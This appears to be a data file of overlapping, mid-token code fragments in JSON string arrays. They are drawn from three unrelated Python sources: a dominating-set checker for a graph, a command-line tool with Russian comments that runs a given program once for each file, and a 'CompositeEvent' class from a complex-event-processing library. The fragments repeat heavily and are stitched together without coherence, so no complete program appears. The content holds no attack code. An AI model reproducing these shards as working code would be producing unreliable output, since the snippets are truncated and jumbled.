"vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False",
"in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False): return",
"if (i==-1): return NA cell=V[i] if (i !=s and cell != 1): NA.append(i)",
"(i==-1): return NA cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1",
"in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i",
"if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return",
"cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if",
"(i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ ==",
"return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)):",
"val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return",
"IsDominatingSet(A,S): NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck)",
"NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def",
"for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L):",
"1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and cell",
"for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is",
"def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and cell !=",
"(is_adj is True): any_adj=True if (any_adj is False): return False return True def",
"return NAV def Flatten(L): Flat=[] for sub in L: for val in sub:",
"False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in",
"for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False",
"i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1], [0,0,1,1,0]]",
"for sub in L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2):",
"NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1],",
"is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)):",
"(any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in",
"range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in",
"sub in L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if",
"return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i]",
"range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub",
"Flatten(L): Flat=[] for sub in L: for val in sub: Flat.append(val) return Flat",
"return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i",
"Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1",
"GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and cell != 1):",
"return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1], [0,0,1,1,0]] S=[1,4]",
"RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV",
"IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1):",
"def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return",
"NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L: for val in",
"any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj",
"NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for",
"Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s):",
"dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)):",
"NAV def Flatten(L): Flat=[] for sub in L: for val in sub: Flat.append(val)",
"return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i]",
"Flat=[] for sub in L: for val in sub: Flat.append(val) return Flat def",
"!= 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0],",
"i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for",
"== 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and",
"any_adj=True if (any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for",
"NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def",
"return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV):",
"GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1], [0,0,1,1,0]] S=[1,4] print(IsDominatingSet(A,S))",
"in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True",
"return NA cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1 return"
] |
[
"параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os import",
"if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1:",
"-- program [options] -- file [file ...]' def main() -> None: arg_parser =",
"1:] files_number = len(files) def percents(index: int) -> str: return '%3d%%' % (100",
"< 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if",
"файлов. Программа принимает в качестве аргументов путь к процессу, его параметры и список",
"(100 * (index + 1) / files_number) for index, filename in enumerate(files): print(percents(index),",
"= filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__ == '__main__': main()",
"file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True,",
"= args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files",
"= args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number = len(files) def",
"запуск указанного процесса для каждого из указанных файлов. Программа принимает в качестве аргументов",
"subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program",
"\"\"\" Рекурсивный запуск указанного процесса для каждого из указанных файлов. Программа принимает в",
"args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) -> str: return '%3d%%'",
"argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args()",
"'%3d%%' % (100 * (index + 1) / files_number) for index, filename in",
"* (index + 1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename))",
"USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file [file ...]' def",
"1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number",
"help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3:",
"[file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать",
"или все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR = '--'",
"одновременно. \"\"\" import os import subprocess import argparse SEPARATOR = '--' USAGE =",
"in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait()",
"ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os import subprocess import",
"процессу, его параметры и список файлов. Затем процесс запускается с указанными параметрами +",
"def percents(index: int) -> str: return '%3d%%' % (100 * (index + 1)",
"int) -> str: return '%3d%%' % (100 * (index + 1) / files_number)",
"index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if",
"filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait:",
"каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if",
"качестве аргументов путь к процессу, его параметры и список файлов. Затем процесс запускается",
"Затем процесс запускается с указанными параметрами + имя одного из файлов. Запуск может",
"arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index",
"const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) <",
"in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd =",
"args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv:",
"завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1)",
"[options] -- file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait',",
"SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1)",
"+ [''] files = args.argv[separator_index + 1:] files_number = len(files) def percents(index: int)",
"3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index",
"not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd",
"имя одного из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения",
"процесса или все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR =",
"последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import",
"+ имя одного из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая",
"exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number =",
"в качестве аргументов путь к процессу, его параметры и список файлов. Затем процесс",
"его параметры и список файлов. Затем процесс запускается с указанными параметрами + имя",
"завершения предыдущего процесса или все одновременно. \"\"\" import os import subprocess import argparse",
"action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv)",
"параметры и список файлов. Затем процесс запускается с указанными параметрами + имя одного",
"файлов. Затем процесс запускается с указанными параметрами + имя одного из файлов. Запуск",
"параметрами + имя одного из файлов. Запуск может производиться последовательно или параллельно, т.е.",
"с указанными параметрами + имя одного из файлов. Запуск может производиться последовательно или",
"= arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1)",
"program [options] -- file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE)",
"= argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args =",
"arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args",
"exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index <",
"args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number = len(files) def percents(index:",
"separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + ['']",
"def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого",
"files = args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) -> str:",
"enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if",
"-> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv',",
"[-h] [--wait] -- program [options] -- file [file ...]' def main() -> None:",
"os import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait]",
"(index + 1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1]",
"предыдущего процесса или все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR",
"= '%(prog)s [-h] [--wait] -- program [options] -- file [file ...]' def main()",
"+ 1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] =",
"<reponame>e2t/cli-tools \"\"\" Рекурсивный запуск указанного процесса для каждого из указанных файлов. Программа принимает",
"процесса для каждого из указанных файлов. Программа принимает в качестве аргументов путь к",
"аргументов путь к процессу, его параметры и список файлов. Затем процесс запускается с",
"список файлов. Затем процесс запускается с указанными параметрами + имя одного из файлов.",
"% (100 * (index + 1) / files_number) for index, filename in enumerate(files):",
"exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] +",
"len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR)",
"или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os",
"одного из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего",
"None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+')",
"separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index +",
"все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR = '--' USAGE",
"указанных файлов. Программа принимает в качестве аргументов путь к процессу, его параметры и",
"запускается с указанными параметрами + имя одного из файлов. Запуск может производиться последовательно",
"/ files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc",
"percents(index: int) -> str: return '%3d%%' % (100 * (index + 1) /",
"'%(prog)s [-h] [--wait] -- program [options] -- file [file ...]' def main() ->",
"Программа принимает в качестве аргументов путь к процессу, его параметры и список файлов.",
"каждого из указанных файлов. Программа принимает в качестве аргументов путь к процессу, его",
"Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все",
"SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file",
"указанными параметрами + имя одного из файлов. Запуск может производиться последовательно или параллельно,",
"str: return '%3d%%' % (100 * (index + 1) / files_number) for index,",
"из указанных файлов. Программа принимает в качестве аргументов путь к процессу, его параметры",
"[''] files = args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) ->",
"nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in",
"[--wait] -- program [options] -- file [file ...]' def main() -> None: arg_parser",
"print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__",
"-- file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const',",
"return '%3d%%' % (100 * (index + 1) / files_number) for index, filename",
"cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__ == '__main__':",
"files_number = len(files) def percents(index: int) -> str: return '%3d%%' % (100 *",
"для каждого из указанных файлов. Программа принимает в качестве аргументов путь к процессу,",
"процесс запускается с указанными параметрами + имя одного из файлов. Запуск может производиться",
"for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd)",
"args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files =",
"т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os import subprocess",
"os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__ ==",
"и список файлов. Затем процесс запускается с указанными параметрами + имя одного из",
"+ 1:] files_number = len(files) def percents(index: int) -> str: return '%3d%%' %",
"к процессу, его параметры и список файлов. Затем процесс запускается с указанными параметрами",
"main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса')",
"if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index",
"Рекурсивный запуск указанного процесса для каждого из указанных файлов. Программа принимает в качестве",
"import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] --",
"файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или",
"\"\"\" import os import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s",
"= args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) -> str: return",
"import os import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h]",
"путь к процессу, его параметры и список файлов. Затем процесс запускается с указанными",
"if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index =",
"len(files) def percents(index: int) -> str: return '%3d%%' % (100 * (index +",
"arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not",
"принимает в качестве аргументов путь к процессу, его параметры и список файлов. Затем",
"< 1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:]",
"args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index]",
"указанного процесса для каждого из указанных файлов. Программа принимает в качестве аргументов путь",
"-> str: return '%3d%%' % (100 * (index + 1) / files_number) for",
"= '--' USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file [file",
"arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if",
"= len(files) def percents(index: int) -> str: return '%3d%%' % (100 * (index",
"argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program [options] --",
"1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename",
"из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса",
"...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения",
"files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc =",
"cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number = len(files)",
"производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\"",
"процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR",
"'--' USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file [file ...]'",
"import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program [options]",
"может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно."
] |
[
"data, defaults to an empty dict. :type data: Dict[str, str], optional :param event_id:",
"= \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory,",
"str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history =",
"name self.history = history def to_dict(self) -> dict: \"\"\" :return: A dict representation",
"def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] = None,",
"dict: \"\"\" :return: A dict representation of the object. \"\"\" return { self.TIMESTAMP:",
"event_id=event_id) self.name = name self.history = history def to_dict(self) -> dict: \"\"\" :return:",
"event to be generated. :type history: BoboHistory :param data: The event data, defaults",
"was first generated. :type timestamp: int :param name: The event name. :type name:",
":param name: The event name. :type name: str :param history: The history of",
"-> dict: \"\"\" :return: A dict representation of the object. \"\"\" return {",
"The event timestamp indicating when it was first generated. :type timestamp: int :param",
"None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name",
"= None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name =",
"str, history: BoboHistory, data: Dict[str, str] = None, event_id: str = None) ->",
"bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param",
":type data: Dict[str, str], optional :param event_id: The event ID, defaults to a",
"None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def to_dict(self) ->",
"from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event",
"indicating when it was first generated. :type timestamp: int :param name: The event",
"super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def to_dict(self) -> dict:",
"event timestamp indicating when it was first generated. :type timestamp: int :param name:",
"= name self.history = history def to_dict(self) -> dict: \"\"\" :return: A dict",
"\"\"\" :return: A dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp,",
"optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name:",
"dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY:",
"CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating when it was",
"generated ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\"",
"empty dict. :type data: Dict[str, str], optional :param event_id: The event ID, defaults",
"the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data,",
"\"\"\"A composite event. :param timestamp: The event timestamp indicating when it was first",
"None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def",
"-> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def to_dict(self)",
"The event ID, defaults to a randomly generated ID. :type event_id: str, optional",
"ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def",
"The event name. :type name: str :param history: The history of events that",
"\"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str,",
"A dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name,",
"return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data, self.EVENT_ID: self.event_id }",
"<reponame>r3w0p/bobocep from typing import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory",
"BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating when",
"data: Dict[str, str], optional :param event_id: The event ID, defaults to a randomly",
":param timestamp: The event timestamp indicating when it was first generated. :type timestamp:",
"from typing import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class",
"HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str,",
"the composite event to be generated. :type history: BoboHistory :param data: The event",
"of events that caused the composite event to be generated. :type history: BoboHistory",
"\"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] =",
"name: str, history: BoboHistory, data: Dict[str, str] = None, event_id: str = None)",
"optional :param event_id: The event ID, defaults to a randomly generated ID. :type",
":param event_id: The event ID, defaults to a randomly generated ID. :type event_id:",
":type name: str :param history: The history of events that caused the composite",
"data: Dict[str, str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data,",
"history: BoboHistory :param data: The event data, defaults to an empty dict. :type",
"event data, defaults to an empty dict. :type data: Dict[str, str], optional :param",
"event name. :type name: str :param history: The history of events that caused",
"ID, defaults to a randomly generated ID. :type event_id: str, optional \"\"\" NAME",
"event ID, defaults to a randomly generated ID. :type event_id: str, optional \"\"\"",
"= None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history",
"__init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] = None, event_id:",
"representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(),",
"bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp",
"= \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str]",
"self.name = name self.history = history def to_dict(self) -> dict: \"\"\" :return: A",
"events that caused the composite event to be generated. :type history: BoboHistory :param",
"generated. :type timestamp: int :param name: The event name. :type name: str :param",
"timestamp: The event timestamp indicating when it was first generated. :type timestamp: int",
":return: A dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME:",
"that caused the composite event to be generated. :type history: BoboHistory :param data:",
"defaults to a randomly generated ID. :type event_id: str, optional \"\"\" NAME =",
"= history def to_dict(self) -> dict: \"\"\" :return: A dict representation of the",
":param history: The history of events that caused the composite event to be",
"NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history:",
"to an empty dict. :type data: Dict[str, str], optional :param event_id: The event",
"class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating when it",
"int :param name: The event name. :type name: str :param history: The history",
"when it was first generated. :type timestamp: int :param name: The event name.",
"of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA:",
"Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite",
"import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A",
":type history: BoboHistory :param data: The event data, defaults to an empty dict.",
"typing import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent):",
"name: The event name. :type name: str :param history: The history of events",
"object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data, self.EVENT_ID:",
"import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp:",
"history def to_dict(self) -> dict: \"\"\" :return: A dict representation of the object.",
":type timestamp: int :param name: The event name. :type name: str :param history:",
"be generated. :type history: BoboHistory :param data: The event data, defaults to an",
"int, name: str, history: BoboHistory, data: Dict[str, str] = None, event_id: str =",
"data: The event data, defaults to an empty dict. :type data: Dict[str, str],",
"history of events that caused the composite event to be generated. :type history:",
"str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int,",
"import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating",
"event_id: The event ID, defaults to a randomly generated ID. :type event_id: str,",
"history: BoboHistory, data: Dict[str, str] = None, event_id: str = None) -> None:",
"composite event to be generated. :type history: BoboHistory :param data: The event data,",
"self.history = history def to_dict(self) -> dict: \"\"\" :return: A dict representation of",
"to_dict(self) -> dict: \"\"\" :return: A dict representation of the object. \"\"\" return",
"\"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data, self.EVENT_ID: self.event_id",
"caused the composite event to be generated. :type history: BoboHistory :param data: The",
"data=data, event_id=event_id) self.name = name self.history = history def to_dict(self) -> dict: \"\"\"",
"\"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data:",
"name: str :param history: The history of events that caused the composite event",
"from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event.",
"timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] = None, event_id: str",
"timestamp: int :param name: The event name. :type name: str :param history: The",
"randomly generated ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY =",
